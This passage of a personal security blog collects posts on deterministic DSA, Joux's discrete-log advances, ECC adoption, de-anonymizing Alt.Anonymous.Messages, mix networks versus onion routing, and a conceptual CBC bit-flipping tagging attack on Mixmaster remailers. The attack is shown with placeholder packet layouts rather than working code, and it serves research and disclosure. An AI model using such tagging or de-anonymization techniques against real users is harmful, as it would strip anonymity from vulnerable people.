Fortunately, we have a solution, and it doesn't necessarily require moving to another algorithm. We can incrementally fix DSA. The k value doesn't necessarily have to be random - it just must be unique and secret. RFC 6979 is a mechanism to generate a unique number based off the key and message, to ensure it's not reused. Dubbed "deterministic DSA" - you can generate signatures with this technique that are completely compatible with any DSA signature-checking implementation. With all the problems DSA has given us, deterministic DSA (or another scheme that does not rely on randomness for every single signature) really needs to be the standard way of generating signatures.

The option to do this in OpenSSL (EC_KEY_set_nonce_from_hash) has been committed (by Adam Langley) and will be available in new versions. To be pedantic, another signature scheme that creates a deterministic, unique value is the ECC-based ed25519 signature scheme; and ~~Schnorr signatures also reduce the dependence on randomness~~ - Schnorr signatures do depend on the RNG.

Cyptopocalypse, and Joux's Work

So let's talk about Cryptopocalypse. What I anticipated being a relatively low impact talk urging folks to examine how we're betting the farm in one particular area (which is always a bad idea) - has turned into a momentous media surge. A lot of folks have rightly picked on how we portrayed the applicability of Joux's work to RSA. I want to follow up with some more details for folks who weren't able to attend, as a lot of the media coverage has been second and third hand accounts.

To start off, in the talk I gave about several examples of the relationship between factoring and discrete logs. It turns out some of the parallels go back even further... to the 1920s and 1930s! "Théories des nombres" (1922) and "On Factoring Large Numbers" (1931) talk about solving Discrete Logs and Factoring respectively, both using the techniques of combining congruencies. For other historical notes, and more math, there's some excellent links worth pointing to in the discussions of the talk.

But let's talk more about the recent work. A lot of focus in the media has been on RSA. Which is understandable, because of how entrenched we are with RSA. Let me go back to the math though. Joux's record setting Discrete Logs are done in a field of small characteristic that is also highly composite. A small characteristic is not what Diffie Hellman, DSA, and ElGamal is done in; they are done in 'large characteristic' fields or more commonly 'prime fields'. (Also, to be clear, this is 'classic' DH and DSA, as opposed to the Elliptic Curve flavors: ECDH and ECDSA.)

There are roughly four steps of the Function Field Sieve:

Polynomial Selection
Sieving
Linear Algebra
the Descent

Polynomial selection is done to find a polynomial that will be used in sieving, and sieving finds relations between the logs of elements in the field. The Linear Algebra is used to solve these relations to get the logarithms of them. The output of the Linear Algebra is a set of vectors, where each vector represents the discrete log of an element. Imagine them as a system of equations. The Descent starts at the specific element you want to solve for, and recursively uses these systems of equations to rewrite the specific element into smaller and smaller terms that you can eventually solve. (That's why it's called the Descent.)

Joux chooses a specific polynomial - this is roughly analogous to the polynomial selection for factoring special numbers (using the Special Number Field Sieve). Based on the structure of the individual target, you choose a polynomial that fits well. The sieving is sped up due to the small characteristic and also because the field being worked on is highly composite. These are optimizations that don't apply directly to prime fields.

Before 2013, in what some people are calling 'classic Function Field Sieve' (which is an interesting hint about how much things have changed) - the Descent was actually pretty fast. Way less than 1% of the run time of an entire Function Field Sieve process. But now, with the new techniques, the Descent is much harder. The sieving is very fast, and you complete the linear algebra quickly - but there are much fewer relations than there were before. It's much harder to descend to them. Before, people didn't care about optimizing the Descent - now it's very important.

And the Descent has been optimized for fields of a small characteristic. It's been optimized to the point of quasi-polynomial, a fantastic achievement. In fact, as the characteristic gets larger (up to "medium" characteristic), the algorithm still applies. It gets slower however - it's basically slower and slower as the characteristic grows.

Does the new Descent algorithm apply to prime fields though? Not right now. And the reason why is very interesting. During the Descent, the major tool used is detecting smooth elements. (A smooth element is one that has small prime factors.) For fields of a small characteristic, this is fast and efficient, because the elements can be represented by polynomials, and detecting the smoothness of a polynomial is easy. For prime fields, the elements seemingly cannot be represented that way. In that case, detecting the smoothness of an element is done by... factoring it.

A major limitation of solving discrete logs in prime fields today, is the lack of an efficient factoring algorithm! Now, for prime fields, ECM is used. (EC stands for 'Elliptic Curve', in yet another all-math-is-related-but-don't-get-confused-because-we-haven't-changed-topics situation. We haven't started talking about Elliptic Curves or anything.) ECM is used because it turns out to be more efficient than the General Number Field Sieve (GNFS) when a number has small factors. (For breaking RSA keys, we use the GNFS.) ECM is being improved, and there are several papers published on the topic each year.

But to circle back home, I wanted to explain Joux's work a slight level deeper (but still quite above the actual published papers.) The recent work have gotten mathematicians very excited about discrete logs, and in essence, Joux's work is very analogous to the Special Number Field Sieve, which is used to factor large numbers that have very specific properties.

The work does not have obvious implications to prime fields (which is what DH, DSA, and ElGamal use) and it does not have obvious implications to RSA (from no less than the the man himself). But all of these problems are somewhat related, and improvements in one area can lead to improvements in another - either from indirect applications of the research, or from focused scrutiny and excitement. Advances in the General Number Field Sieve have evolved out of the Special Number Field Sieve.

We need much more flexibility in our cryptographic protocols. When advances are made, we are bit by them - again, and again, and again. MD5 was known to be weak in the mid-2000s - but it took generating a rogue certificate authority to convince browsers and CAs they needed to deprecate it right away. (And it still took them a few years.) And even after that - Stuxnet still exploited a MD5-based vulnerability. Single-DES was known to be brute-forcible in 1999, and yet we're still breaking deployed protocols relying on it today: MSCHAPv2 in 2012, SIM Cards and PEAP network authentication in 2013. RSA-1024 is known to be weak today (estimates I've seen have suggested it's doable with 3-11 TB RAM clusters, which isn't terribly large). And while (some) browsers seem to plan on distrusting 1024-bit root certs in early 2014 - we're going to be trusting 1024-bit certs for much longer than we should be. (Oh, and Apache has no option to increase the DH bit-length above 1024, so your "Perfect Forward Secrecy" DHE sessions aren't looking too good.)

If you aren't planning for the Cryptopocalypse of whatever algorithm and keysize you're trusting right now - you're doomed to repeat the same mistakes. Because we keep falling victim to known-broken algorithms again, and again, and again.

ECC & TLS

In our slides, we mentioned that TLS 1.2 was the first to include ECC options. Some ciphersuites will not work in prior versions of TLS (like GCM-based ciphersuites) but others will. Adam Langley pointed out you can use ECDH, ECDHE, and ECDSA in TLS 1.0, so long as your browser supports it (and nearly all up to date browsers do). Also, a small correction - you are able to have the CA and Certificate signing algorithm not match prior to TLS 1.2 - cross-signing is possible in TLS 1.0.

Something I'd like to be called out on, that we haven't been yet, is being able to easily buy a ECC-based SSL cert from a Certificate Authority. It sure would be nice to be able to buy an ECC certificate for my website. Now I've had one or two people ask me - if you don't trust RSA, what's the point of getting an ECC cert when the whole internet trusts tons of RSA-based CAs?

And the answer is Certificate Pinning. You can use Chrome's preloaded pins, the almost-completed Public Key Pinning header, the forthcoming TACK extension, and iOS and Android solutions to pin to your ECC cert, and not have to worry about RSA or compromised certificate authorities.

ECC is Nice

At the end of our talk we lay out a lot of recommendations for people.

If you work on an OS or a language - make ECC easy to use, and use it yourself
If you work on a browser - keep pushing TLS 1.2. (All browsers are working on this, to be fair)
If you write software - support TLS 1.2 on your webservers, make your protocols upgradable (or use TLS 1.2), and don't place all your trust for software updates in any single thing like RSA
If you're a CA - make it easy to buy ECC certs, and document the process
If you're a normal company - turn on ECDHE, survey your exposure

Making ECC built-in, accessible, and relied-on makes sense. The Prime Field curves have strong security margins, shorter ciphertext (awesome for cellular and mobile), and efficiency gains. We're having major difficulties moving off RSA 1024, and that shouldn't be trusted today. Starting supporting ECC today will make it so much less painful to migrate to it when we need to. It's much, much easier for clients (especially browsers) to disable support for a newly vulnerable feature than it is to deploy a brand-new feature entirely.

As an important footnote, Colin Percival and Dennis F pointed out that binary curves give most people pause. And the reasoning is excellent - Binary Curves have an 'inherent structure', and we seem to be pretty good at exploiting inherent structures. So staying on the P curves is prudent.

Do we have anything else?

Now I just talked about needing flexibility, and then said ECC a bunch of times. Betting the farm on ECC isn't flexibility. Flexibility comes from RSA + ECC, ideally in tandem, but if not, being able to switch between them easily. But what about things besides ECC?

As Matt Green points out, there's the McEliece Cryptosystem which only has 187 kilobit - 1 megabit keys. That's sarcasm.) And there's NTRU, which looks pretty awesome. It's efficient, well studied, and even is standardized. It is however patented. There's some flexbility there, and the patent may be expiring soon, but just as OCB mode never caught on (probably due to the patent), NTRU isn't catching on either. A shame, in my opinion, as NTRU neatly avoids the 'Quantum Cryptopocalypse' also.

I would be remiss if I did not thank Jason Papadopoulos and Pierrick Gaudry for all their work helping me understand this stuff. Any errors are entirely mine and not theirs.

De-Anonymizing Alt.Anonymous.Messages Followup 1

12 Aug 2013 19:00:00 EDT

I've been overwhelmed by the positive response to De-Anonymizing Alt.Anonymous.Messages on twitter, mailing lists, reddit, and all around. I recognize it's pretty niche (in comparison to the Femtocell talk, the room in AAM slowly dwindled, as opposed to slowly filling up over time) - but I'm glad people enjoyed it, and I'm extremely happy that publishing the transcript/speaker notes has let so many more people read it. I also want to thank Zax, again. I had some ideas about how nymservs and Type I remailers worked, and I was pretty far off. Fortunately, I engaged Zax a few months out from my talk, and he was able right most of my views - without his help I would have been in sad shape.

I wanted to follow up on a few comments I saw. I got a message via the hoi-polloi.org mixmaster node that pointed me to another suite of software I did not include in my slides. Most of these programs have been updated in the past few months - so they are actively maintained.

The suite includes:

An AAM checker for checking AAM and checking if you have new messages (hardcoded subjects or hsubs only, no esubs it appears).
An email-substitute for communicating with a specific person or persons via nyms and AAM, including automatically setting up your nym
A program that seems to combine the previous two programs into a generic AAM reader and poster
A cover traffic tool to send dummy Mixmaster messages and dummy AAM messages from your connection, so someone watching ideally isn't quite sure which messages you send are legit and which are not.

I haven't actually examined any of the code (although they seem to be open source on sourceforge) - but maybe this is a nice architecture to explore more of: use shared libraries to provide functionality, and have simple and more complicated GUIs on top for more and less technical users. (Not that I'd call the 'simple' GUIs that simple, I'm just talking in the abstract.)

For a listing of other AAM tools, check the Bonus Slides at the end of the original AAM slides (with speaker notes).

De-Anonymizing Alt.Anonymous.Messages

3 Aug 2013 16:00:00 PDT

For the past four years I've been working on a project to analyze Alt.Anonymous.Messages, and it was finally getting to a point where I thought I should show my work. I just finished presenting it at Defcon, and because a lot of the people I know are interested in this were not able to make it, I'm making the slides, and more importantly the speaker notes, available for download. This kind of kills the chance anyone will actually watch the video, but that's all right.

The slides cover the information-theoretic differences between SSL, Onion Routing, Mix Networks, and Shared Mailboxes. It talks about the size of the dataset I analyzed, and some broad percentages of the types of messages in it (PGP vs Non-PGP, Remailed vs Non-Remailed). Then I go into a large analysis of the types of PGP-encrypted messages there are. Messages encrypted to public keys, to passwords and passphrases, and PGP messages not encrypted at all!

For messages encrypted to a public key, I can draw communication graphs, and there are some interesting graphs - some very symmetrical ones where everyone talks to everyone else, and some less structured ones that may model a larger community where not everyone knows everyone else. I also perform brute force attacks against password-encrypted messages, using GPU-powered crackers I had to develop myself. These usually crack into messages encrypted to public keys and are sent from a Type I nymserv.

On the statistical analysis-like side of things, I correlate subjects that are in plaintext and hexadecimal (including cracking hsubs using more custom GPU code). I also look at message headers, including several unique ones added on the client (such as distinguishing ones like unique Newsgroups headers, and misspellings of X-No-Archive). Several Type I remailer directives made their way into AAM, even though they shouldn't have - Type I remailers are pretty difficult to use. And there are some very interesting message patterns such as redundant messages and off response patterns.

Summing up, I talk about Nymservs (and Pynchon Gate), the current status of the Mixmaster and Mixminion networks and software (and the path forward for Mixminion), and finally wax poetically about the need for a high-bandwidth, high-latency... something to securely leak and share large files.

For more on this and related topics like remailers, I slowly write about them over at crypto.is (and copy the blogs posts here), and on IRC in OFTC #cryptodotis

Femtocell Media Blitz, and Vegas 2013

15 Jul 2013 08:26:00 EST

Hi all. If you wound up here as a result of the many news articles about the Verizon femtocell - thanks. This is my personal site, and while I try to keep it pretty tech relevant, it goes into more cryptography and anonymity theory than my company's website. Obviously, the opinions I express here and on twitter are not my employer's.

If you'd like to learn more about how we broke into Verizon's Network Extender and can use it to listen to your phone calls, read your SMS and MMS, and man-in-the-middle your data connection - Doug and I will be presenting the work at Black Hat and Defcon later this month! (With the help of Andrew Rahimi who has helped us on this project immensely.)

Besides the Femtocell talk (which believe me, is plenty), I'm also presenting twice more in Vegas. At Black Hat, The Factoring Dead: Preparing for the Cryptopocalypse is a talk I'm helping out just a smidge on with Alex Stamos, Tom Ptacek, and Javed Samuel. There's been a lot of recent advances from Joux in solving discrete logrithms in fields of a small characteristic. What if this made the jump to RSA and factoring? How screwed would we be? And at Defcon, a talk I've been working on for literally years: De-Anonymizing Alt.Anonymous.Messages. Have you ever looked at it? It's a giant shared inbox of encrypted messages. Have someone dump messages to you there, and nobody knows if you recieved a message or not. Well, at least in theory. I've collected hundreds of thousands of posts and have been working on analyzing, brute forcing, and correlating messages based on... metadata.

Dendritic arborization in dauer IL2 neurons

24 Jun 2013 20:05:34 EST

This week is the 19th Annual International C. Elegans Meeting, where the poster Dendritic arborization in dauer IL2 neurons: Genetic and bioinformatic analyses is being presented, which I am a contributing author on. This work shows the changes that IL2 neurons undergo as a result of the stress-induced dauer lifecycle stage. For more information, you can attend the meeting and register on-site where the poster will be presented this Saturday June 29th, between 3:30 and 5PM PST.

Decrypting Amazon EC2 Windows Passwords

3 Mar 2013 18:43:34 EST

If you spin up a Windows Instance on Amazon EC2, the only way to get your password to it is using an Amazon-provided command-line tool to decrypt the password (supplying your private SSH Key) or pasting your private SSH key into the Web Interface. That didn't sit too well with me. I'd prefer Amazon not have my private SSH key.

I dug into the web interface, and their 3MB of obfuscated javascript, and found that do the decryption locally in Javascript - as they should. I feel a little better now, but just the same I'd rather not trust them not to go and steal the key, or change it to a server operation for "performance reasons" or something.

The password is padded with PKCS#1 1.5, encrypted, and then put through some odd byte/hex transformations. If you'd like to decrypt the password yourself, locally, I've put up a script on github to do so. It doesn't handle every corner case (encrypted keys being the biggest) but it hopefully it helps you a little.

Liberation Technology Auditing Guidelines

27 Feb 2013 21:06:34 EST

Liberation Technology is kind of a catch-all bucket I borrowed from Stanford's Program & Listserv that I use to describe technology that's designed to be used by activisits, journalists, folks with increased privacy needs (survey participants, whistleblowers, law enforcement), and the like. (I'm probably offending or upsetting someone by using this term willy nilly but I don't have a better one.) These types of applications obviously have a higher bar for security: not only do they need to be free from the major 'bad' vulnerabilities like SQL Injection and Memory Corruption - but also thought and attention needs to be paid to things like "What third party requests are made?" and "What does my use of this application leak to a network observer?"

There are a dearth of folks who are good at reviewing these applications, and of the ones their are - their time is spread too thinly and ultimately it's nobody's job so it's done in their free time. To that end, I took a stab at putting all the things I've picked up over the years together, in an effort to get more folks involved in the process. That list (sponsored by my employer) lives over here at github. It's aimed directly at fellow security consultants, and intended to list additional technical issues to search for when auditing these types of applications. I'm not nearly the best at this, and I don't do as much as I'd like to, but it's something, and you can improve or fork it.

What should you target with these ideas? Everything! There are high-profile applications like the ones by the Tor Project, Whisper Systems, and the Guardian Project. There are newer flashy projects like Cryptocat, MEGA, and Crypton. And there are brand-new projects that might take a bit of reverse engineering to understand - like Wickr and Silent Circle. And this is not an exhaustive list. The number of these types of applications has been increasing significantly in the past couple of years. The number of auditors has not.

I hope this list will inspire more people to look at these applications and contribute to them.

This post originally appeared on iSEC Partners' blog.

The Differences Between Onion Routing and Mix Networks

12 Apr 2013 16:52:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

As was pointed out in a recent comment on the first blog post, I had used the terms "mix network" and "onion routing" almost interchangeably. In actuality I had fallen into a trap that a fair number of people familiar with the space have fallen into: using those terms without a solid differentiation. This blog post aims to correct that.

Firstly, I must give credit where credit is due - Paul Syverson (one of the original authors of Tor) wrote the paper that cemented this in my head most clearly, and I will quote it, and then restate it with pictures:

Mix networks get their security from the mixing done by their component mixes, and may or may not use route unpredictability to enhance security. Onion routing networks primarily get their security from choosing routes that are difficult for the adversary to observe, which for designs deployed to date has meant choosing unpredictable routes through a network. And onion routers typically employ no mixing at all. This gets at the essence of the two even if it is a bit too quick on both sides. Mixes are also usually intended to resist an adversary that can observe all traffic everywhere and, in some threat models, to actively change traffic. Onion routing assumes that an adversary who observes both ends of a communication path will completely break the anonymity of its traffic. Thus, onion routing networks are designed to resist a local adversary, one that can only see a subset of the network and the traffic on it.

- Paul Syverson - Why I'm not an Entropist

Onion Routing

Onion Routing gets its security from the fact (or assumption) that it is difficult for an adversary to position itself on networks such that it is able to view all the nodes in the route. Practically speaking, if I built a route from my job in China, to a server in Australia, to a server in Russia, to a server in Sweden, and then visit a webpage in France - there are a number of adversaries who could see part of this path. For example: my employer, my employer's Internet Service Provider, the Chinese, Australian, Russian, Swedish, and French Governments, the website operator and their Internet Service Provider. But none of those entities are able to see the entire path (we hope!) because they do not own, control, or have direct influence over every network link I'm using. In this instance, Onion Routing can provide some security.

Onion Routing Attacked

But if an adversary is able to see the entire path, Onion Routing loses its security. I recently used a crowd of people in a real-life demonstration of this. Alice puts a message into an opaque film canister, and passes it to an onion routing node, who passes it to another, who passes it to another, who takes the message out of the canister, and hands it to the recipient Bob. Everyone in the room can clearly see that it was Alice who passed a message to Bob, and even if there were multiple messages being passed, anyone could focus on an individual, and watch where the film canister passed wound up.

There's been rumors and talks in the past of China or Iran cutting themselves off from the Internet, and making their own national Internet. If they did, we could not just stand up a Tor network inside the country: it would provide no security because the government would be able to see the entire path.

There is another scenario where Onion Routing is known to fall down. If the adversary can see one node (A), and later another node (C) - even if there is an unseen or unknown number of nodes between A and C, an attacker can correlate the traffic. A specific instance of this means if an attacker can see you, and can see the website you're visiting, even if you create a path outside the adversary's control - they will still be able to correlate the traffic and learn you are visiting the website. This clearly raises concerns about using Onion Routing to visit a company website or websites related to your own government.

Mix Networks

Mixing; however, is specifically designed to provide security even if an adversary can see the entire path. To demonstrate this to a crowd of people I had Alice, Bob, and Carol each submit messages, in opaque film canisters, into my mix node (my backpack). With all three film canister messages in my bag, I shook it, and distributed each message to a new mix node, each of which also had a couple of messages in their bags already. Then those nodes distributed messages to 6 more mix nodes, and those mix nodes opened the messages and distributed them to recipients. Although everyone was able to see all of the messages that were passed around - it's impossible to tell who got Alice's, Bob's, or Carol's specific message. The mixing, in backpacks, creates uncertainty for the attacker they are not able to overcome.

Mixing isn't perfect. An adversary can still conduct long term correlation attacks, and if no one or almost no one uses the mix network along with you - it's even easier to attack. Furthermore, just because mix networks provide stronger security against a stronger adversary does not mean they provide better security in general. If you'd like to learn why, you can wait a while until I post about it, or just skip the middle man and read Sleeping dogs lie on a bed of onions but wake when mixed by Paul Syverson.

More Differences

A Mix Node must collect more than one message before sending any out - otherwise the node is behaving as an onion router node with a time delay. The more messages collected, the more uncertainty is introduced as to which message went where. The specific mixing algorithms employed (often calling pooling algorithms) will be a subject of a future blog post, but it's clear there must be multiple messages, which means the collected messages will generally sit in a mix node until 'sufficient' messages are collected (for some definition of sufficient). This introduces latency. If a mix node waits six hours to collect messages - well that's up to six hours of latency. Accordingly, mix networks are often casually referred to as 'high latency' and onion routing networks as 'low latency'. But the latency doesn't impart security - it's the mixing.

Tor is an Onion Routing network. It employs no mixing, and barring normal system task scheduling and processing, messages are sent as soon as they are received. The attacks described against onion routing above can and have been shown to work against Tor. While there is no evidence a government has resorted to performing the types of statistical attacks described in Academic papers - they have done rudimentary correlation involving physical surveillance. Specifically: they watched a suspect arrive home, they watched some Tor traffic originate from his home, and they watched as the nickname they suspected was him appeared in the IRC channel. If you're curious, you can read more about that over here. Although Tor is a powerful tool, it is possible to distinguish Tor traffic from normal traffic, and it is possible to perform correlation-based attacks to de-anonymize your use of it.

Something to keep in mind is that deployed mix networks (Mixmaster, Mixminion) are not designed to disguise the fact that you are using a mix network. If an adversary can simply lock you up for using anonymity tools, you need to disguise your use of anonymity tools, which is a whole other topic. Similarly, these tools are relatively obscure, and if an adversary can simply look across a large quantity of email traffic looking for someone who has received a Mixmaster message, who had not previously, simple correlation may also be possible.

A Tagging Attack on Mixmaster

05 Jan 2013 23:48:00 EST

This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.

We've laid the groundwork in the past two blog posts to explain a tagging attack on the Mixmaster remailer system. In our scenario, an attacker runs several remailer nodes in a system.

An attacker may get lucky and control the first and last nodes in a path.

This seems a hopeless scenario - but for a single message, a good remailer network can provide unlinkability in this situation. An attacker would know that Alice sent an email, and they would know that john@nytimes.com recieved an email, and its contents - but the attacker should not be able to link these two messages together. That unlinkability is supposed to be provided by the middle node. But the unlinkability is lost if the attacker can tag the message in a way for them to recognize later. This example also illustrates why you want a lot of people using an anonymity network - there are vastly more people in the crowd that could have sent the incoming message, and vastly outgoing messages Alice could have sent.

But where in the Mixmaster packet format can we create a tag that won't be rejected by the middle node, would allow us to recognize the tag when we see it, and not corrupt the Mix Message so much that we are unable to determine the ultimate destination of the message? Let's go back to the packet format (which we covered in a previous blog post) - we'll display the data we will see, and what we know, as it leaves the first (attacker-controlled) node.

Mixmaster Intermediate Message, as it is on it's way to the Second HopMix HeadersMix Header 1Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
                           Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC
Initialization Vector      0x09090909 0x09090909
Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x02
Packet Information
Initialization Vector1     0x0A0A0A0A 0x0A0A0A0A
Initialization Vector2     0x0B0A0A0A 0x0B0A0A0A
Initialization Vector3     0x0C0A0A0A 0x0C0A0A0A
Initialization Vector4     0x0D0A0A0A 0x0D0A0A0A
Initialization Vector5     0x0E0A0A0A 0x0E0A0A0A
Initialization Vector6     0x0F0A0A0A 0x0F0A0A0A
Initialization Vector7     0x1A0A0A0A 0x1A0A0A0A
Initialization Vector8     0x1B0A0A0A 0x1B0A0A0A
Initialization Vector9     0x1C0A0A0A 0x1C0A0A0A
Initialization Vector10    0x1D0A0A0A 0x1D0A0A0A
Initialization Vector11    0x1F0A0A0A 0x1F0A0A0A
Initialization Vector12    0x2A0A0A0A 0x2A0A0A0A
Initialization Vector13    0x2B0A0A0A 0x2B0A0A0A
Initialization Vector14    0x2C0A0A0A 0x2C0A0A0A
Initialization Vector15    0x2D0A0A0A 0x2D0A0A0A
Initialization Vector16    0x2E0A0A0A 0x2E0A0A0A
Initialization Vector17    0x2F0A0A0A 0x2F0A0A0A
Initialization Vector18    0x3A0A0A0A 0x3A0A0A0A
Initialization Vector19    0x3B0A0A0A 0x3B0A0A0A
Remailer Address           exitremailer@exam.com 0x00 0x00 (Padded to 80 bytes)
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
Mix Header 2
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
Initialization Vector      0x09090909 0x09090909
Encrypted Header Part
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
Mix Headers 3-20Fake, Unimportant Data     0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....
Mix PayloadIndecipherable Data

The different layers of red represent the number of times it is encrypted. Light Red is encrypted once. Dark Red must be sent through two decryptions before the plaintext is ledgible. The ciphertext is encrypted in Cipher Block Chaining Mode, which allows us to made small modifications to ciphertext that have small modifications to the plaintext. It's not as precise as we'd like - flipping a single bit will entirely corrupt the 8 bytes of that data block, but it will flip the corresponding bit of the subsequant data block. Let's zero in on the second Mix Header, and illustrate the data blocks.

Mix Header 2Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
Initialization Vector      0x09090909 0x09090909
Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 0x01020304 0x05060708
                           (Fill to 328 Bytes..)

The blue block illustrate the blocks of data that will be encrypted in CBC mode. Flipping a bit in one of these will corrupt the entire block, and flip the resulting bit in the following block. However, remember we're dealing with multiple layers of encryption: the Encrypted Header Part is also encrypted, and its block offsets are different.

Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 0x01020304 0x05060708
                           (Fill to 328 Bytes..)

Any byte we manipulate in the second Mix Header will corrupt that blue block of data entirely, and the corresponding byte in the subsequent block. Every blue corrupted byte will corrupt any red blocks that contains the byte. And the final red block will corrupt the subsequent red block. And, we can't cause a corruption that renders the Encryption Key or IV irrecoverable - or we won't be able to decrypt the payload - we must choose carefully.

The Attack

Now to give in to the suspense ;) If we manipulate the last byte of the Message Digest we will perform a cascading corruption that does not affect the Key or IV. First we manipulate that byte:

Mix Header 2Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
Initialization Vector      0x09090909 0x09090909
Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 0x01020304 0x05060708
                           (Fill to 328 Bytes..)

On decryption this corrupts the entire block, and corrupts the appropriate byte in the subsequent block:

Mix Header 2Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678     
Initialization Vector      0x09090909 0x09090909
Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
Initialization Vector      0x0A0A0A0A 0x0A0A0A0A
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 0x01020304 0x05060708
                           (Fill to 328 Bytes..)

Which in turn corrupts all blocks containing one of those bytes at the inner layer, and alters the following block in an unpredictable fashion:

Encrypted Header PartPacket ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
